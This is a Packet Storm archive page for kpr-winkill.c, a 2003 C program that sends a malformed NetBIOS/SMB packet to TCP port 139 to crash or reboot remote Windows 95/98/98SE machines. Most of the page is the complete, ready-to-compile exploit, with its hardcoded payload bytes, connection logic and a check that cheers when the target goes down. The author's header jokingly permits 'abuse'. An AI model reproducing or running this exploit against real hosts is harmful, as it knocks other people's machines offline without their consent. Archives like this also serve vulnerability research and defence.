what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

kpr-winkill.c

kpr-winkill.c
Posted Nov 14, 2003
Authored by Koper

Microsoft Windows 95/98/98SE denial of service utility that makes use of malformed NETBIOS packets to lock-up and reboot the machine.

tags | denial of service
systems | windows
SHA-256 | 926d171c8c658d8861fb0067abda1bc605fcc9caf1e0a70a1986947d8c097432

kpr-winkill.c

Change Mirror Download
/*

Windows 95,98 and 98SE Denial Of Service.
by koper <koper@linuxmail.org>


Uses NetBIOS malformed packets
to freeze/reboot remote mashine.

Don't abuse ... @least not 2much

;>

*/

#include <stdio.h>
#include <stdlib.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <unistd.h>
#include <string.h>

#define PORT 139 //NetBIOS port ... ma sie rozumiec ;)

char kprcode[]= "\x00\x00\x00\x41\xff\x53\x4d\x42\xd0\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x19\x00\x04\x42\x45\x41\x56\x00\x04\x42\x45\x41\x56\x49"
"\x53\x00\x01\x08\x00\x4f\x70\x65\x6e\x20\x59\x6f\x75\x72\x20"
"\x6d\x69\x6e\x64\x2e\x2e\x2e\x20\x61\x6e\x64\x20\x49\x20\x77\x69"
"\x6c\x6c\x20\x62\x65\x20\x74\x68\x65\x72\x65\x2e\x20\x6b\x70\x72\x0a";

struct samba_req
{
char first[5];
char yourname[32];
char sep[2];
char myname[32];
char end[1];
};

void name(char *name1, char *name2);

unsigned long int dns (char *host);

int main(int argc, char *argv[]){
char buf[4000], buf2[4000], myname[33], yourname[33];
struct sockaddr_in piggie;
int soc, soc2, connex, x, x2;
struct samba_req smbreq;
long temp;

printf("\n******************************************************\n");
printf("* Windows 95 && 98 Denial Of Service NetBIOS exploit *\n");
printf("* \t by koper <koper@linuxmail.org> *\n");
printf("******************************************************\n");
printf(" Version: 0.5 - Support for Windows 98 SE\n\n");

if (argc < 3) {
printf("Usage: %s <IP> <NetBIOS name>\n", argv[0]);
printf("NetBIOS name must be in uppercase!\n");
exit(1);}


name("KPR",myname);
myname[30]='A';
myname[31]='D';

name(argv[2],yourname);
yourname[30]='A';
yourname[31]='D';
printf("[+] Trying %s as NetBIOS name %s...\n",argv[1],argv[2]);
printf("[+] Resolving...\n");
temp = dns(argv[1]);

piggie.sin_addr.s_addr = dns(argv[1]);
piggie.sin_family = AF_INET;
piggie.sin_port = htons(PORT);

printf("[+] %s resolved: OK...\n", argv[1]);
soc = socket(AF_INET,SOCK_STREAM,0);
if((connex = connect(soc,(struct sockaddr *)&piggie,sizeof(piggie)))<0){ perror("[+] Error"); exit(1);}

memset(buf,0,4000);
memset(buf2,0,4000);

memcpy(smbreq.first,"\x81\x00\x00\x44\x20",5);
memcpy(smbreq.sep,"\x00\x20",2);
memcpy(smbreq.end,"\x00",1);
strncpy(smbreq.myname,myname,32);
strncpy(smbreq.yourname,yourname,32);

write(soc,&smbreq,72);
x=read(soc,buf,4000);

if(x<1){ printf("[+] Oh my god! There's no responce !?!\n[+] Panic!\n");
exit(1);}

if(buf[0]=='\x82') {
printf("[+] Got responce from remote host...\n");
printf("[+] Initialising attack...\n");}
else {printf("[+] No responce from remote machine (check NBname)...\n[+] Panic!\n"); exit(1);}

write(soc,&kprcode,72);
x=read(soc,buf,4000);
close(soc);
printf("[+] Packet SENT!\n");
printf("[+] Checking hostname...\n");

write(soc,&smbreq,72);
x2=read(soc,buf2,4000);

soc2=socket(AF_INET,SOCK_STREAM,0);
if(connect(soc2,(struct sockaddr *)&piggie,sizeof(piggie))<0)
printf("[+] Host is down... YEAH!\n\n");
else printf("[+] %s is still up, probably not vulnerable...\n\n",argv[1]);
}

void name(char *name1, char *name2)
{ char c, c1, c2;
int i, len;
len = strlen(name1);
for (i = 0; i < 16; i++) {
if (i >= len) {
c1 = 'C'; c2 = 'A';
} else {
c = name1[i];
c1 = (char)((int)c/16 + (int)'A');
c2 = (char)((int)c%16 + (int)'A');
}
name2[i*2] = c1;
name2[i*2+1] = c2;
}
name2[32] = 0;
}


unsigned long int dns (char *host)
{
long i;
struct hostent *he;
i = inet_addr(host);
if (i==-1){
he=gethostbyname(host);
if(he==NULL){
printf("[+] Unable to resolve %s...\n[+] Panic!\n", host);
exit(0);
} else{return(*(unsigned long *) he->h_addr); }
return(i); }
}
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close